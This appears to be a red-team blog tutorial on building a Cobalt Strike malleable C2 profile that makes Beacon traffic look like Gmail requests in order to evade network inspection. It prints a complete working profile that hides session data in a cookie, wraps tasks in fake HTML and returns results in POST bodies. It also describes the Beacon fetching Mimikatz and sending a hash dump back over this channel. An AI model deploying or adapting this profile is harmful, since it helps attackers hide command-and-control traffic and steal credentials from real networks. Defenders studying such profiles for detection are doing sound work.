I want to discuss creating a Cobalt Strike malleable C2 profile that shapes the Beacon's connection to the team server. Set up properly, the profile makes the Beacon's traffic look trustworthy to the security devices in the path. There are a lot of profiles available on the internet that you can use.
A Cobalt Strike Beacon communicates with the team server using HTTP GET and HTTP POST transactions, which are configured in the profile's http-get and http-post blocks.
With the C2 profile, we can shape this HTTP communication to mimic legitimate HTTP traffic: we can make our traffic look like traffic to google.com, amazon.com and many other sites in order to evade detection.
In the picture above we can see two blocks, client and server. In them we set up what the HTTP headers and parameters will look like, so that our Beacon communication evades inspection. Let's analyse this in the HTTP debugger.
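To make the client/server split concrete, here is a small profile that mimics Gmail traffic. It is an added example written for this post, not the profile from the original article or one shipped with Cobalt Strike; the URIs, header values and cookie name are assumptions chosen to look like webmail traffic, not captured from Gmail. Each transaction has a client block (what the Beacon sends) and a server block (what the team server answers), and the metadata, id and output blocks decide where the Beacon's data is hidden and how it is encoded.

```text
# Added example profile (not the original post's). Values are illustrative.
set sleeptime "60000";
set jitter    "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36";

http-get {
    set uri "/mail/u/0/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Host" "mail.google.com";
        # Beacon session metadata is base64url-encoded and hidden in a cookie
        metadata {
            base64url;
            prepend "GMAIL_AT=";
            header "Cookie";
        }
    }
    server {
        header "Server" "GSE";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Content-Type" "text/html; charset=UTF-8";
        # Tasks for the Beacon are wrapped in what looks like an HTML page
        output {
            base64;
            prepend "<!DOCTYPE html><html><head><title>Gmail</title></head><body><div id=\"loading\">";
            append "</div></body></html>";
            print;
        }
    }
}

http-post {
    set uri "/mail/u/0/sync";
    set verb "POST";
    client {
        header "Content-Type" "application/x-www-form-urlencoded;charset=utf-8";
        header "Host" "mail.google.com";
        # Session id travels as a query parameter, results in the POST body
        id {
            parameter "ik";
        }
        output {
            base64url;
            print;
        }
    }
    server {
        header "Server" "GSE";
        header "Content-Type" "text/plain; charset=UTF-8";
        output {
            base64;
            print;
        }
    }
}
```

Run the profile through c2lint (shipped with Cobalt Strike) before loading it on the team server; it checks the syntax and shows sample GET/POST transactions so you can compare them with what the HTTP debugger later records. Note that the Host header and URIs only change what the request looks like: the destination IP address and the TLS certificate are still those of your own server, which is exactly the mismatch a careful defender looks for.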
From both screenshots above we can see the mapping between the profile and the traffic that we use to disguise the connection.
Beacon uses HTTP POST to submit data to the server. Although the Host header shows the domain rioasmara.com, the actual destination IP is my local IP. So if the defender is not careful in assessing the traffic (checking only the hostname and not where the packets actually go), it will look legitimate.
Below we can see the Cobalt Strike Beacon downloading Mimikatz from the server and sending the result back via HTTP POST.
Sending the result back to the server.
Cobalt Strike gives you considerable freedom to craft your C2 profile. You can mimic legitimate traffic as you want, and this makes evasion even better, because it is tough to differentiate the Beacon traffic from normal traffic.
Sample of a hash dump mimicking a Gmail traffic profile